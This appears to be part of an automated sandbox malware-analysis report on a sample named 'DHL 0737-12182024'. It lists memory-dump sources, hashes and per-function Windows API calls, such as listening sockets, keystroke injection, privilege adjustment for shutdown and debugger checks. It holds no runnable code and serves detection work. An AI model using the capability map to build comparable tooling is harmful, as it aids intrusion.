• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 24e2ba7706323aaf44a0d52a4e5aff7bd67b26087fc421ae90f0c3fdfda0de1a
• Instruction ID: bef3eb186a6b89930488b378f5fd205ee730ed7506407ee6bf2526afb41ceecd
• Opcode Fuzzy Hash: 24e2ba7706323aaf44a0d52a4e5aff7bd67b26087fc421ae90f0c3fdfda0de1a
• Instruction Fuzzy Hash: 41417C35604611AFDB20DF19E888F29BBA5FF44328F188199E429CB662C775EC41CB91
APIs
  • Part of subcall function 008816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0088170D
  • Part of subcall function 008816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0088173A
  • Part of subcall function 008816C3: GetLastError.KERNEL32 ref: 0088174A
• ExitWindowsEx.USER32(?,00000000), ref: 0088E932
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
• Opcode ID: 18cc0b370e99ab911f4358893c931ad71aa778ad6a82ea46dbe42af406f343fb
• Instruction ID: c7b04576f2906d9da24a8d992345c9a53b84df5bd7d2aafbf25152eeacd074e8
• Opcode Fuzzy Hash: 18cc0b370e99ab911f4358893c931ad71aa778ad6a82ea46dbe42af406f343fb
• Instruction Fuzzy Hash: 9101F972610215ABEB6476B99C8AFBF775CF714754F154521FC13E21E2EAE0AC4083A0
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008A1276
• WSAGetLastError.WSOCK32 ref: 008A1283
• bind.WSOCK32(00000000,?,00000010), ref: 008A12BA
• WSAGetLastError.WSOCK32 ref: 008A12C5
• closesocket.WSOCK32(00000000), ref: 008A12F4
• listen.WSOCK32(00000000,00000005), ref: 008A1303
• WSAGetLastError.WSOCK32 ref: 008A130D
• closesocket.WSOCK32(00000000), ref: 008A133C
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: 46e932184fc121d166a7d455c7c2544730623c6da4ca4b4db6faeeedc07a5042
• Instruction ID: edc692186a83d3a1fdbe73c282509ef48e021acbef66848cdaaab204550c5dc0
• Opcode Fuzzy Hash: 46e932184fc121d166a7d455c7c2544730623c6da4ca4b4db6faeeedc07a5042
• Instruction Fuzzy Hash: 7A417F316001109FEB10DF68D588B2ABBE5FF46318F188198E856DF696C775ED81CBE1
APIs
• _free.LIBCMT ref: 0085B9D4
• _free.LIBCMT ref: 0085B9F8
• _free.LIBCMT ref: 0085BB7F
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008C3700), ref: 0085BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,008F121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0085BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,008F1270,000000FF,?,0000003F,00000000,?), ref: 0085BC36
• _free.LIBCMT ref: 0085BD4B
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: a5f4a5ead29e6d5496fa40b0a0ba591149200040ef2a798eab3313af8d4816a9
• Instruction ID: 59c51eb0dbce57202b216201f234c6ecab971c756cb32ee8160dd10b0dbac60b
• Opcode Fuzzy Hash: a5f4a5ead29e6d5496fa40b0a0ba591149200040ef2a798eab3313af8d4816a9
• Instruction Fuzzy Hash: 5EC129719042489FCB21DF799C45BBABBB8FF61362F1441AAEC90E7251EB308E49C751
                                                                                            APIs
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                              • Part of subcall function 0088E199: GetFileAttributesW.KERNEL32(?,0088CF95), ref: 0088E19A
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0088D420
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0088D470
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0088D481
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088D498
                                                                                            • FindClose.KERNEL32(00000000), ref: 0088D4A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                            • String ID: \*.*
                                                                                            • API String ID: 2649000838-1173974218
                                                                                            • Opcode ID: dddbbd6decb1be583dfd4cac14b7424639e66e87b269ea7cfa4f9ec0ad3bfadb
                                                                                            • Instruction ID: 61a1010e6fd0b5fc7d277557e11e692f94e570d4984de8c46bc588d5839c9ac0
                                                                                            • Opcode Fuzzy Hash: dddbbd6decb1be583dfd4cac14b7424639e66e87b269ea7cfa4f9ec0ad3bfadb
                                                                                            • Instruction Fuzzy Hash: 81315C710083559BC304FF68E8958AFB7A8FE95314F444A2DF4D1D21A1EB30AA49CB67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __floor_pentium4
                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                            • API String ID: 4168288129-2761157908
                                                                                            • Opcode ID: e22717d328db10d0f4692ec32d1d7c1285c0f166976a787dde6d91ec72f55d62
                                                                                            • Instruction ID: 07683d1b2ab182157a13acb91b8fcf57a6dbc14d9a9d8e0d5b4d4d77661ce0c9
                                                                                            • Opcode Fuzzy Hash: e22717d328db10d0f4692ec32d1d7c1285c0f166976a787dde6d91ec72f55d62
                                                                                            • Instruction Fuzzy Hash: 63C22A71E046288FDB29CE28DD407EAB7B5FB48306F1441EAD94DE7241E774AE898F41
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 008964DC
                                                                                            • CoInitialize.OLE32(00000000), ref: 00896639
                                                                                            • CoCreateInstance.OLE32(008BFCF8,00000000,00000001,008BFB68,?), ref: 00896650
                                                                                            • CoUninitialize.OLE32 ref: 008968D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 886957087-24824748
                                                                                            • Opcode ID: 27494c0a6d88a54fc0e926a3ee0136d2fefe1bd7377695195624f7c302f62c0a
                                                                                            • Instruction ID: 5fffc080e39bcac0be9f7940355ae58669a849327959036659c9caf070624fe1
                                                                                            • Opcode Fuzzy Hash: 27494c0a6d88a54fc0e926a3ee0136d2fefe1bd7377695195624f7c302f62c0a
                                                                                            • Instruction Fuzzy Hash: 6AD13771508211AFC704EF28D891E6BB7E8FF98704F04496DF595CB2A1EB70E949CB92
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 008A22E8
                                                                                              • Part of subcall function 0089E4EC: GetWindowRect.USER32(?,?), ref: 0089E504
                                                                                            • GetDesktopWindow.USER32 ref: 008A2312
                                                                                            • GetWindowRect.USER32(00000000), ref: 008A2319
                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 008A2355
                                                                                            • GetCursorPos.USER32(?), ref: 008A2381
                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008A23DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                            • String ID:
                                                                                            • API String ID: 2387181109-0
                                                                                            • Opcode ID: 36ae15102eae923b0048803e3e22ebb274ca9771dd62882164241552f0bd87f1
                                                                                            • Instruction ID: 3b89aa2dffaf1c9d84801d748dc60f894296f14a3ea17f9987d5db12b80ccda7
                                                                                            • Opcode Fuzzy Hash: 36ae15102eae923b0048803e3e22ebb274ca9771dd62882164241552f0bd87f1
                                                                                            • Instruction Fuzzy Hash: 1B31AD72504315AFDB20DF58C849B9BBBA9FF86314F000A19F985D7291DB74EA09CB92
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00899B78
                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00899C8B
                                                                                              • Part of subcall function 00893874: GetInputState.USER32 ref: 008938CB
                                                                                              • Part of subcall function 00893874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00893966
                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00899BA8
                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00899C75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                            • String ID: *.*
                                                                                            • API String ID: 1972594611-438819550
                                                                                            • Opcode ID: a226569e1eb2e1a540ef08f6bf09b6e730a936c7276910ded8708a896fca5058
                                                                                            • Instruction ID: 01e89d16fc96ccc3a1a0e0fec629e57d69e7a1f86609d8125efc38a2e36d65cc
                                                                                            • Opcode Fuzzy Hash: a226569e1eb2e1a540ef08f6bf09b6e730a936c7276910ded8708a896fca5058
                                                                                            • Instruction Fuzzy Hash: 8641607190021A9FCF14EF68DC55AEE7BB8FF05314F18415AE855E2291EB349E84CF61
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00839A4E
                                                                                            • GetSysColor.USER32(0000000F), ref: 00839B23
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00839B36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$LongProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3131106179-0
                                                                                            • Opcode ID: 8d028dcca6dd35cf59ca4ef152459a1a3d4f79626644a1b3007f0dc3cd17e66f
                                                                                            • Instruction ID: 66b233a1405723bb2efd3b05795d56a47f4bc76aff0d9b0c35d74902cb2f5706
                                                                                            • Opcode Fuzzy Hash: 8d028dcca6dd35cf59ca4ef152459a1a3d4f79626644a1b3007f0dc3cd17e66f
                                                                                            • Instruction Fuzzy Hash: 31A13C71208428EEE7289A3C8C59EBB3A5DFBC2354F154319F582C66D9CAA5DD01C3F2
                                                                                            APIs
                                                                                              • Part of subcall function 008A304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008A307A
                                                                                              • Part of subcall function 008A304E: _wcslen.LIBCMT ref: 008A309B
                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 008A185D
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1884
                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 008A18DB
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A18E6
                                                                                            • closesocket.WSOCK32(00000000), ref: 008A1915
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1601658205-0
                                                                                            • Opcode ID: 52ed4d1618b9c6706455aff9c125ad89e3c77f3a77004d79dec36bf9debc0254
                                                                                            • Instruction ID: 59d59d0a5917431afbe9d3e35582b525dce9c396a0df89bf1ab74bb393573ad1
                                                                                            • Opcode Fuzzy Hash: 52ed4d1618b9c6706455aff9c125ad89e3c77f3a77004d79dec36bf9debc0254
                                                                                            • Instruction Fuzzy Hash: 4251B371A002109FEB10AF28D886F2A77E5FB45718F088058F9059F783DB75AD41CBE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                            • String ID:
                                                                                            • API String ID: 292994002-0
                                                                                            • Opcode ID: e71b006ea79415eea50eb18ae0353211934ef840bb7c642d12deee6b525826e3
                                                                                            • Instruction ID: 389eeb2a17288fc8729a0d8e30407d020c7e0ca2a9bd7149652f5f7a049edd64
                                                                                            • Opcode Fuzzy Hash: e71b006ea79415eea50eb18ae0353211934ef840bb7c642d12deee6b525826e3
                                                                                            • Instruction Fuzzy Hash: B621A3317402119FDB208F1AD868BAA7FA5FF95314F598058E84ACF352CB71ED42CB95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                            • API String ID: 0-1546025612
                                                                                            • Opcode ID: dac799d16a452db6c1ad93260a5f74b5a9940dbcaa4bcd98f5f40ab0014ca7fa
                                                                                            • Instruction ID: 59399ca08b8fe6e6c6667f5aacf1527fd87585db6595aac4def7cbed65b43eb3
                                                                                            • Opcode Fuzzy Hash: dac799d16a452db6c1ad93260a5f74b5a9940dbcaa4bcd98f5f40ab0014ca7fa
                                                                                            • Instruction Fuzzy Hash: E4A27970A0166ACBDF24CF58D9447AEB7B1FB54314F2581AAE815EB384EB309DD1CB90
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 008AA6AC
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 008AA6BA
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 008AA79C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AA7AB
                                                                                              • Part of subcall function 0083CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00863303,?), ref: 0083CE8A
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1991900642-0
                                                                                            • Opcode ID: b0a1a2d10b70dfc568e555fc5e32aea4b7a6a2be9d06d10cb0587b5df5e2d0c0
                                                                                            • Instruction ID: d79fa7cd5c941dcbab52c318f560f6e73503adb2bd5cb322a844685075306060
                                                                                            • Opcode Fuzzy Hash: b0a1a2d10b70dfc568e555fc5e32aea4b7a6a2be9d06d10cb0587b5df5e2d0c0
                                                                                            • Instruction Fuzzy Hash: A0513871508310AFD714EF28D886A6BBBE8FF89754F00492DF585D7252EB30D944CB92
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0088AAAC
                                                                                            • SetKeyboardState.USER32(00000080), ref: 0088AAC8
                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0088AB36
                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0088AB88
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: b3eb334a661dd35a36aa6b3ade21eebcf029672205a1186a39691dccb62e7657
                                                                                            • Instruction ID: 12fecddced54e19681360557a64f9655334e7d7e0100029db4eb6922eaa33fd2
                                                                                            • Opcode Fuzzy Hash: b3eb334a661dd35a36aa6b3ade21eebcf029672205a1186a39691dccb62e7657
                                                                                            • Instruction Fuzzy Hash: 5D31F630A40258AEFB39AA688C05BFA7BA6FB45330F04421BF5C1D65D1D3759981C763
                                                                                            APIs
                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0089CE89
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0089CEEA
                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0089CEFE
                                                                                            Similarity
                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 234945975-0
                                                                                            • Opcode ID: f49e529b51d08918a2835a5d96b0391e628c2ba6aff43e1fdfd5ba5ab06392b7
                                                                                            • Instruction ID: 1debd0588b88b1beef469985b4b18744ff1d79f763458bad4c55897c275f4804
                                                                                            • Opcode Fuzzy Hash: f49e529b51d08918a2835a5d96b0391e628c2ba6aff43e1fdfd5ba5ab06392b7
                                                                                            • Instruction Fuzzy Hash: BE219DB15007099FDB30EF65C948BAA77F8FB50358F14442EE546D2151EB75EE048B64
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008882AA
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: lstrlen
                                                                                            • String ID: ($|
                                                                                            • API String ID: 1659193697-1631851259
                                                                                            • Opcode ID: 98a49fb9da157b0f9db026a12087a71453b497dd0b7778892ee243b58918ced8
                                                                                            • Instruction ID: d9ae9b67d34a545e85f48ecf160b1b6d16706f156aba5fd644342cda9f9b7b7f
                                                                                            • Opcode Fuzzy Hash: 98a49fb9da157b0f9db026a12087a71453b497dd0b7778892ee243b58918ced8
                                                                                            • Instruction Fuzzy Hash: 0A323474A00605DFCB28DF59C480A6AB7F0FF48710B55C56EE59ADB3A1EB70E981CB40
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00895CC1
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00895D17
                                                                                            • FindClose.KERNEL32(?), ref: 00895D5F
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 0b8204a5cb3f5e1d0f7bc3a825c7a083c1b8077c30fa8b0a7f41af022ad46177
                                                                                            • Instruction ID: 6148d0fe850fc41f018553aaf5b370beba424cd7bfe01682f8eaebfd4a0e6969
                                                                                            • Opcode Fuzzy Hash: 0b8204a5cb3f5e1d0f7bc3a825c7a083c1b8077c30fa8b0a7f41af022ad46177
                                                                                            • Instruction Fuzzy Hash: 14519A346046019FCB14DF28D498A9AB7E4FF49324F18856EE95ACB3A2DB30ED44CB91
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0085271A
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00852724
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00852731
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 2f891b6d98fd4b854316aed62e344c95414839cc034ea3ba3d76a16eb4db095a
                                                                                            • Instruction ID: a8fd0ae91a0b625dea2cf1987bf22241d627dc4b3432a5b0c1a6ed314e8828b6
                                                                                            • Opcode Fuzzy Hash: 2f891b6d98fd4b854316aed62e344c95414839cc034ea3ba3d76a16eb4db095a
                                                                                            • Instruction Fuzzy Hash: 9A31B67591122C9BCB21DF68DC89B99B7B8FF08310F5041DAE81CA6261EB309F858F45
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 008951DA
                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00895238
                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 008952A1
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                            • String ID:
                                                                                            • API String ID: 1682464887-0
                                                                                            • Opcode ID: 95eb73fb7f4e0dd4e95c46f67f9cffb128f03883d70c70355bd8fbde8cf30fdf
                                                                                            • Instruction ID: 8f1173be2077804032e46a88eb7f42c9081999b4e1c07984ba9131c205c12632
                                                                                            • Opcode Fuzzy Hash: 95eb73fb7f4e0dd4e95c46f67f9cffb128f03883d70c70355bd8fbde8cf30fdf
                                                                                            • Instruction Fuzzy Hash: 51313E75A00518DFDB00EF98D884EADBBB5FF49314F088099E805EB3A2DB31E855CB91
                                                                                            APIs
                                                                                              • Part of subcall function 0083FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00840668
                                                                                              • Part of subcall function 0083FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00840685
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0088170D
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0088173A
                                                                                            • GetLastError.KERNEL32 ref: 0088174A
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                            • String ID:
                                                                                            • API String ID: 577356006-0
